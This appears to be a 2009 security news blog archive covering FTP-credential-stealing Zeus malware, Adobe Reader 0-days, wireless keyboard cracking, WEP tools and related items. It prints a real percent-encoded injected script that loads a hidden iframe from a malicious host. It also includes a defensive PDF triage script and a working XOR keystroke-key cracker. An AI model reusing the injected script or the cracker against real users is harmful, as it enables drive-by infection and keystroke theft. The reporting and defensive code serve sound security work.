Malware using FTP details in Wild

July 1st, 2009

On Wednesday the 24th of June, 2009, Prevx detected a new Trojan that harvests FTP credentials from compromised machines. The list of compromised machines is vast: we have seen 66,000 unique FTP server logins from unique domains, rising to 74,000 by Friday. The list is now so large that we have no way to inform the affected companies in a meaningful timeframe.
What is the severity of this infection?

We rate this infection as CRITICAL. It has 'china syndrome' potential: a cyclic infection that uses infected PCs to programmatically modify high-volume web sites so that they infect additional users, who in turn become part of the cycle. More infected users means more discovered web site admin credentials, which means more web sites modified to serve the infection, which means more infected users.

What is the infection vector?
The malware infects users who visit a compromised web site, through various exploit kits such as 'unique pack'. The compromised web pages contain an injected script that looks something like the example below (the percent-encoded string decodes to a 1x1, borderless iframe pointing at stopssse.info/l.php?bse):
fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');

What does the malware do?

Once installed, the malware, a variant of the Zeus family, scours the machine's stored form cache for saved FTP login credentials. When it finds any, it sends them with an HTTP POST to a server located in the Cayman Islands. A second component acts as a script injector: it calls a particular script on the same Cayman Islands server, using the domain goooodbill.cn, and the script hands the infected client a URL in the format USERNAME:PASSWORD@FTP.ADDRESS.COM. The client then logs in to that FTP site, modifies every index page (asp, php, html) and injects the script. Once the pages are injected, every visitor to the modified domain potentially becomes part of the infection network/cycle.

Michael Jackson Conspiracy Malware

July 1st, 2009

Even after his death, Michael Jackson's name is still being exploited to draw attention, this time by malware authors. Don't be lured by links promising the "truth" about his death; whatever is known is already on the news channels.

Yes, sadly we’re still talking about people taking advantage of Michael Jackson’s death.

This week we've seen a rise in malware purporting to show images and video from the days leading up to Michael's death; malware groups around the world appear to be getting in on the act.

[Screenshots: MJ X-Files web content]

Anyone taking the standard precautions shouldn't have difficulty avoiding this one: make sure JavaScript is disabled by default (so you are not infected by Mal/ObfJS-BP, found in the 1x1 iframe, which tries to download and run the EXE through an old Acrobat Reader vulnerability), and don't run the linked EXE manually (everyone knows that clicking on EXEs on a web page is a bad idea, right?), or you end up infected with Troj/ZBot-GJ.

Durzosploit is a javascript exploits generator framework

June 23rd, 2009

Durzosploit is a JavaScript exploit generator framework that works from the console. The goal of the project is to quickly and easily generate working exploits for cross-site scripting vulnerabilities in popular web applications or web sites.

Durzosploit does not find browser vulnerabilities; it is only a framework containing exploits you can use.

Further details can be found here:

http://engineeringforfun.com/wiki/index.php/Durzosploit_Introduction

Two 0-day Highly Critical Adobe Reader Vulnerabilities Disclosed

June 22nd, 2009

A hacker calling himself Arr1val has published proof-of-concept exploit code for two 0-day vulnerabilities affecting Adobe Reader and Acrobat. The company has already confirmed one of them and strongly suggests disabling JavaScript in the products until a patch is available.

The flaws are classified by SecurityFocus as "boundary condition errors." The first is located in the getAnnots() JavaScript function and the other in spell.customDictionaryOpen(). Both allow an attacker to execute arbitrary code on systems with the affected products installed by tricking users into opening a maliciously crafted PDF file.

According to Arr1val's PoC exploits, published on Packet Storm in the early hours of Tuesday, the vulnerabilities were tested on Adobe Reader 9.1 and 8.1.4 running on Linux. Adobe acknowledged the report and started an investigation into the issues. "We are currently investigating, and will have an update once we get more information," David Lenoe initially announced on the blog of Adobe's Product Security Incident Response Team (PSIRT).
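Until the patch ships, the practical question for anyone handling PDFs is whether a given file carries JavaScript at all and whether that script calls either of the two functions named above. The following Python triage is an added example (not Adobe's code and not Arr1val's PoC): it normalises #xx-escaped PDF names (so /J#61vaScript is not missed), inflates FlateDecode streams, and reports the triggers and risky calls it finds. The sample PDF is constructed inside the block purely for the test and only calls this.getAnnots(); it is not an exploit.

```python
"""Static triage of a PDF for the JavaScript calls named in the advisory.

Added example; not Adobe's code and not Arr1val's proof of concept.
It answers: does the file contain JavaScript, what triggers it
(/OpenAction, /AA, a /JavaScript action), and does the script call
getAnnots() or spell.customDictionaryOpen()?
"""
import re
import zlib

NAME_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\nendstream", re.S)
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)

# Keys that make a document execute something, and the two functions the
# advisory names.
TRIGGERS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch"]
RISKY_CALLS = [b"getAnnots", b"customDictionaryOpen"]


def unescape_names(data):
    """Turn /J#61vaScript back into /JavaScript so keyword checks see it."""
    return NAME_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data):
    """Concatenate every stream body that inflates as zlib/FlateDecode.
    Streams with other filters or corrupt data are skipped; a trailing CR
    left by CRLF line endings is tolerated."""
    out = []
    for m in STREAM_RE.finditer(data):
        raw = m.group(1)
        for body in (raw, raw.rstrip(b"\r")):
            try:
                out.append(zlib.decompress(body))
                break
            except zlib.error:
                continue
    return b"\n".join(out)


def _has_key(key, data):
    # \b stops /JS from matching a longer name such as /JScript.
    return re.search(re.escape(key) + rb"\b", data) is not None


def keywords_by_object(data):
    """Map object number -> trigger keys found in that object."""
    found = {}
    for m in OBJ_RE.finditer(unescape_names(data)):
        hits = [t.decode() for t in TRIGGERS if _has_key(t, m.group(3))]
        if hits:
            found[int(m.group(1))] = hits
    return found


def triage_pdf(data):
    """Return triggers, risky function calls, per-object hits and a verdict."""
    # Unescape names on the raw file and, separately, on the inflated stream
    # contents: rewriting compressed bytes before inflating would corrupt them.
    searchable = unescape_names(data) + b"\n" + unescape_names(inflate_streams(data))
    triggers = [t.decode() for t in TRIGGERS if _has_key(t, searchable)]
    risky = [c.decode() for c in RISKY_CALLS if c in searchable]
    has_js = "/JS" in triggers or "/JavaScript" in triggers
    auto = "/OpenAction" in triggers or "/AA" in triggers
    if risky:
        verdict = "suspicious: calls a function from the advisory"
    elif has_js and auto:
        verdict = "suspicious: JavaScript runs automatically"
    elif has_js:
        verdict = "review: contains JavaScript"
    else:
        verdict = "no JavaScript found"
    return {"triggers": triggers, "risky_calls": risky,
            "objects": keywords_by_object(data), "verdict": verdict}


def build_sample_pdf():
    """Constructed minimal PDF: OpenAction -> /J#61vaScript action whose /JS
    is a Flate-compressed stream calling this.getAnnots(). Not an exploit."""
    js = b"var a = this.getAnnots({nPage: 0}); app.alert(a.length);"
    body = zlib.compress(js)
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>",
        b"<< /Type /Pages /Kids [] /Count 0 >>",
        b"<< /S /J#61vaScript /JS 4 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(body) + body + b"\nendstream",
    ]
    pdf = b"%PDF-1.4\n"
    for num, obj in enumerate(objects, 1):
        pdf += b"%d 0 obj\n" % num + obj + b"\nendobj\n"
    return pdf + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    print(triage_pdf(build_sample_pdf()))
```

A "no JavaScript found" verdict is only as good as the decoding: object streams (/ObjStm) and filters other than Flate are not expanded here, so a clean result on an unusual file still warrants a look with a fuller parser before the file is opened with JavaScript enabled.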

BackTrack Pre Final – Public Release and Download

June 19th, 2009

The Remote Exploit Team is ecstatic to announce the public release of BackTrack 4 Pre Final (codename "pwnsauce"). A VMware image of BT4 will be released in a few days. We have made major changes in BackTrack and have tried to document and summarize them as best we can.

Read the full story here:

http://www.offensive-security.com/blog/backtrack/backtrack-pre-final-public-release-and-download/

Cracking wireless keyboard encryption software published

June 18th, 2009

Users of Microsoft's Optical Desktop 1000 and 2000 wireless keyboards should consider replacing them with wired keyboards, since it is now practical for attackers to sniff their keystrokes. About a year and a half after announcing that they had cracked Microsoft's wireless keyboard encryption, Max Moser and Thorsten Schröder of Dreamlab have published the Keykeriki software along with instructions for building the sniffing hardware (circuit diagram and board layout in Eagle format).
The hardware is based on the Texas Instruments TRF7900A 27 MHz receiver used in wireless mice and keyboards, controlled by an 8-bit Atmel microcontroller. Dreamlab is even considering selling ready-assembled units.
In a 49-page presentation, Moser and Schröder explain the hardware and software details behind the hack. Two Flash videos on the project page show the software and hardware in action.
Only Microsoft wireless keyboards transmitting in the 27 MHz band are currently affected; Bluetooth keyboards are not at risk. Decoding the Microsoft keyboards is extremely easy because the encryption is a simple XOR with an 8-bit key, which leaves only 256 possible keys to try. Although the method of cracking these keyboards has been known since December 2007, Moser and Schröder have so far found nothing to indicate that Microsoft has taken steps to resolve the situation.
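To make the "simple XOR with an 8-bit key" point concrete, here is an added Python example; it is not Dreamlab's Keykeriki code and does not model the real keyboards' radio frame format. It keeps only the property described above: every transmitted keystroke byte is the plaintext XORed with one fixed 8-bit key. Keystrokes are represented as ASCII bytes for readability (an assumption; the real frames carry key codes), the sample capture is constructed inside the block, and the cracker shows both the known-plaintext shortcut (one guessed keystroke, such as Enter, gives the key outright) and the ciphertext-only brute force over all 256 keys.

```python
"""Recovering an 8-bit XOR key from sniffed keystrokes.

Added example; not Dreamlab's Keykeriki code. Models only the property the
article describes: each keystroke byte is XORed with a single fixed 8-bit
key, so a sniffer has at most 256 keys to try.
"""

# Rough English letter frequencies (percent); space is the most common byte
# in typed text. Unprintable bytes other than CR/LF are penalised.
_WEIGHTS = {" ": 13.0, "e": 12.7, "t": 9.1, "a": 8.2, "o": 7.5, "i": 7.0,
            "n": 6.7, "s": 6.3, "h": 6.1, "r": 6.0, "d": 4.3, "l": 4.0,
            "u": 2.8, "c": 2.8, "m": 2.4, "w": 2.4, "f": 2.2, "g": 2.0,
            "y": 2.0, "p": 1.9, "b": 1.5, "v": 1.0, "k": 0.8}
ENGLISH_WEIGHT = {ord(ch): w for ch, w in _WEIGHTS.items()}


def xor_bytes(data, key):
    """Apply the one-byte XOR 'cipher' (encryption and decryption are identical)."""
    return bytes(b ^ key for b in data)


def key_from_known_keystroke(cipher_byte, plain_byte):
    """Known plaintext: one keystroke you can guess (say, Enter after a
    password) yields the key directly."""
    return cipher_byte ^ plain_byte


def plausibility(candidate):
    """Score how much a byte string looks like typed English text."""
    score = 0.0
    for b in candidate:
        if 65 <= b <= 90:           # fold upper case onto the lower-case table
            b += 32
        if b in ENGLISH_WEIGHT:
            score += ENGLISH_WEIGHT[b]
        elif b in (0x0D, 0x0A) or 0x20 <= b < 0x7F:
            pass                    # printable but not scored
        else:
            score -= 10.0           # control/high bytes: not keystrokes
    return score


def crack_xor8(captured):
    """Ciphertext only: try all 256 keys and rank by plausibility.
    'margin' is the gap to the runner-up; a small margin means the
    capture is too short to decide and more traffic is needed."""
    ranked = sorted(((plausibility(xor_bytes(captured, k)), k) for k in range(256)),
                    reverse=True)
    (best_score, best_key), (second_score, _) = ranked[0], ranked[1]
    return {"key": best_key,
            "plaintext": xor_bytes(captured, best_key),
            "score": best_score,
            "margin": best_score - second_score}


# Constructed capture: what a sniffer would see if this text were typed on
# a keyboard whose pairing had picked key 0xA7 (assumed value).
SAMPLE_KEY = 0xA7
SAMPLE_PLAINTEXT = b"login as root then type the secret\r"
SAMPLE_CAPTURE = xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    print(crack_xor8(SAMPLE_CAPTURE))
    print(hex(key_from_known_keystroke(SAMPLE_CAPTURE[-1], 0x0D)))
```

The brute force is the whole attack: 256 candidates is a loop, not cryptanalysis, and with a few dozen captured keystrokes the frequency score separates the true key from the runner-up comfortably. A key that survives this sort of test has to be long enough that trying every value is infeasible, which is the difference between this scheme and a real cipher.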
The researchers will target 2.4 GHz keyboards next. Even switching to a wired keyboard, however, doesn’t seem to be the ultimate solution. Researchers at the CanSecWest security conference have already demonstrated how to tap wired keyboards by taking laser measurements and monitoring power line leakage.

Bug in McAfee patch

June 12th, 2009

A bug in Patch 1 for McAfee VirusScan Enterprise 8.7i caused serious problems, according to several user reports. On updated PCs, the scanner "discovered" a worm (W32/Generic.worm.aa) in several Windows XP and Vista system files and deleted or quarantined them. As a result, the PCs hung or rebooted repeatedly when restarted.
To avoid further damage, McAfee initially removed the patch from its service portal and download pages. Users who have already installed Patch 1 but have not noticed any problems yet are advised by McAfee not to uninstall it: the DAT files McAfee has been distributing since the 7th of June are said to prevent the false alarm and so eliminate the problem.
Customers that have already encountered problems are advised to contact McAfee support. McAfee says the error only affected a small number of business clients, but several disgruntled administrators are discussing the subject in the McAfee forums.
The number of false alarms from virus scanners has risen sharply in the recent past. In February, Bitdefender and G DATA crippled many Windows systems by incorrectly identifying winlogon.exe as a trojan and deleting it. Bitdefender and G DATA are not the only products producing false positives, however.

WEPbuster - wireless security assessment tool - WEP cracking

June 7th, 2009

WEPBuster is a toolkit that automates the tasks otherwise performed by hand with the various parts of the aircrack-ng suite.

The end goal of course is to crack the WEP key of a given Wireless network.

Features

The main feature is the autonomous nature of the toolkit: it can crack all access points within range in one go. Beyond that, the features are those found in aircrack-ng.

  • Mac address filtering bypass (via mac spoofing)
  • Auto reveal hidden SSID
  • Client-less Access Point injection
  • Shared Key Authentication
  • WEP Decloaking (future version)
  • Whitelists (crack only APs included in the list)
  • Blacklists (do not crack APs included in the list)

You can download WEPBuster here: WEPbuster.tgz

(IN)SECURE magazine

June 7th, 2009

*Malicious PDF: Get owned without opening
*Review: IronKey Personal
*Windows 7 security features: Building on Vista
*Using Wireshark to capture and analyze wireless traffic
*”Unclonable” RFID - a technical overview
*Secure development principles
*Q&A: Ron Gula on Nessus and Tenable Network Security
*Establish your social media presence with security in mind
*A historical perspective on the cybersecurity dilemma
*A risk-based, cost effective approach to holistic security
*AND MORE! Download it here

Wireless Attackers and Honeypot Technology

June 2nd, 2009

Security analyst Raul Siles has written a paper on the use of wireless honeypot (dubbed "honeyspot") technology to study the skills and capabilities of wireless attackers. Describing the architecture and deployment of a wireless honeypot, Siles' paper is a valuable resource for enhancing the security of wireless networks, either as a tool for analysing attacker skills and techniques or as a decoy to draw attackers away from other networks ("Pay no attention to the man behind the curtain"). More information is available in Raul's blog post, or you can grab the paper from the Spanish Honeypot website.
Thanks Rahul..